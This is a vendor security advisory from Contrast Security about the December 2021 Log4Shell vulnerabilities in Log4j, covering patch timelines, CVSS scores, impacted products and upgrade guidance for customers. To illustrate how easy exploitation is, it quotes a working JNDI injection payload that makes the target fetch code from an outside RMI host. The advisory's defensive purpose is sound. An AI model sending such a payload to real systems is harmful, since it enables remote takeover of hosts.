Originally posted: Dec 10th, 2021 (All times Eastern/ U.S.)
This page is updated frequently. Please see date/time (GMT) in the by line for most current article update.
- What happened? What and who specifically does this impact?
- What is the vulnerability / incident?
- Why is it bad?
- How likely is it?
- How severe is it?
- How is this relevant for Contrast Security and which customers might be impacted?
- How does a Contrast customer determine if and where they’re vulnerable?
- What should a Contrast customer do, if anything?
- Related Articles
What happened? What and who specifically does this impact?
A zero day vulnerability for the ubiquitous library Log4J was published at ~9:30 a.m. US Eastern on 2021-12-09 and is now published as CVE-2021-44228.
All customers of Contrast were impacted. The vulnerable library was confirmed to be used in the Contrast application; both SaaS and On-Premises (“EOP”) deployments. No evidence of any penetration has been identified by Contrast at this time.
- 12/9/2021 at 22:15 EST, Contrast had already patched the SaaS application to log4j2.15.
- 12/14/2021 at 15:37 EST, Contrast has patched all SaaS applications to log4j2.16.
- 12/18/2021 at 11:36 EST, Contrast has patched all SaaS applications to log4j2.17.
- 12/18/2021 at 12:18 EST, Contrast has released a patched EOP with log4j2.17
With the upgrade to log4j 2.17 this covers:
For On-Premises customers, Contrast has released a patched version with log4j2.17 that all customers are recommended to upgrade
Of note: While Contrast software is impacted and we are notifying all customers, it is extremely likely that your company’s Java application portfolio is also impacted. Please take measures to upgrade/update your portfolio immediately. Protect guards most applications for most vectors including published POCs, and we’re working to close gaps we’ve identified internally
What is the vulnerability / incident?
CVE-2021-44228 - More information from the National Vulnerability Database can be found (here).
Additional references can be found on social media platforms like Twitter (here).
Why is it bad?
The library in question is highly distributed across Java applications. Contrast believes this CVE will have an extremely broad impact in the community impacting the majority of Java applications.
Contrast has confirmed this library was in use across several Contrast products (detail below).
How likely is it?
Any application that uses Log4j to log any information controlled by the attacker is vulnerable, including any HTTP headers, URIs, parameters, or cookies. Exploitation is exceptionally simple and can be easily automated. For example, sending “${jndi:rmi://192.168.1.31:1099/9tmpja}”
in a single HTTP request is enough to take full control of the application host. The risk is especially high if your system is accessible via the world wide web as we are detecting widespread automated attacks against our customers. Contrast Labs has confirmed that it is exploitable.
Our evaluation efforts will continue and we will keep you apprised of our progress.
How severe is it?
While these CVEs are still under scrutiny by the National Institute of Standards and Technology (NIST) at this time, they have set initial CVSS scores. However, the Apache Software foundation continues to update the scores. Contrast experts agree with the ASF scoring and have updated our CVE scoring to reflect these updates.
CVE-2021-44228 - CVSS 10.0
- More information from the National Vulnerability Database can be found (here)
- Apache Software Foundation rates this as a 10.0 CVSS (here)
- Fixed in version 2.15
CVE-2021-45046 - CVSS 9.0
- More information from the National Vulnerability Database can be found (here)
- Apache Software Foundation rates this as a 9.0 CVSS (here)
- Fixed in version 2.16
CVE-2021-45105 - CVSS 7.5
- More information from the National Vulnerability Database can be found (here)
- Apache Software Foundation rates this as a 9.0 CVSS (here)
- Fixed in version 2.17
How is this relevant for Contrast Security and which customers might be impacted?
Contrast hosted (SaaS) customers would have been impacted had this been exploited. Our teams have patched all hosted (SaaS) systems, and no evidence of penetration has been detected.
Contrast EOP customers whose systems are accessible via the web should patch their system immediately. A patched version of EOP has been released and all customers are recommended to upgrade ASAP.
Contrast Java agent is not impacted. In order for Contrast Security products to support applications that use legacy technologies and frameworks like Java 6, Java 7 and JBoss, our Java agent is using an older version of log4j. Our team audits our dependencies for security risk and we have found our usage of log4j 1.x to be an acceptable risk. However, we are looking into releasing a newer version of the Java agent that does not depend on the log4j 1.x, but may not support legacy frameworks mentioned above.
Product |
Impacted |
Protected |
Patched |
Hosted (SaaS) Environments (all) |
Yes |
Yes Contrast Protect in place. |
Yes
|
On-premises (EOP) Environments |
Yes |
No |
Yes
|
Java Agent |
No |
N/A |
N/A |
Scan |
Yes |
Yes Contrast Protect in place. |
Yes
|
How does a Contrast customer determine if and where they’re vulnerable?
All versions of Contrast EOP Teamserver are vulnerable to this zero-day prior to 3.8.10.1566200307. Additionally, per ASF recommendations. We have released 3.8.10.1589286247 which adds further protection against CVE-2021-45046 by updating to log4j2.16. An additional release 3.8.10.1596449597 adds protection against CVE-2021-45105 by updating to log4j2.17.
What should a Contrast customer do, if anything?
On-Premises customers are recommended to upgrade to the latest patched version (3.8.10.1596449597 or higher) available on Hub (here). Standard upgrade instructions (here) can be followed.
For customers’ portfolio of Java applications, Customers will need to search for the vulnerable library in their apps and update with the patched library as soon as possible. Contrast Labs has also confirmed that Contrast Assess will flag this vulnerability as “Log Injection” in vulnerable code paths. Contrast SCA will also identify this vulnerable library. Contrast has published a blog with recommended fixes to all vulnerable Java applications here: https://www.contrastsecurity.com/security-influencers/0-day-detection-of-log4j2-vulnerability
If you have any questions, concerns, or would like to discuss this issue further, please don’t hesitate to reach out to us via the link below or at support@contrastsecurity.com.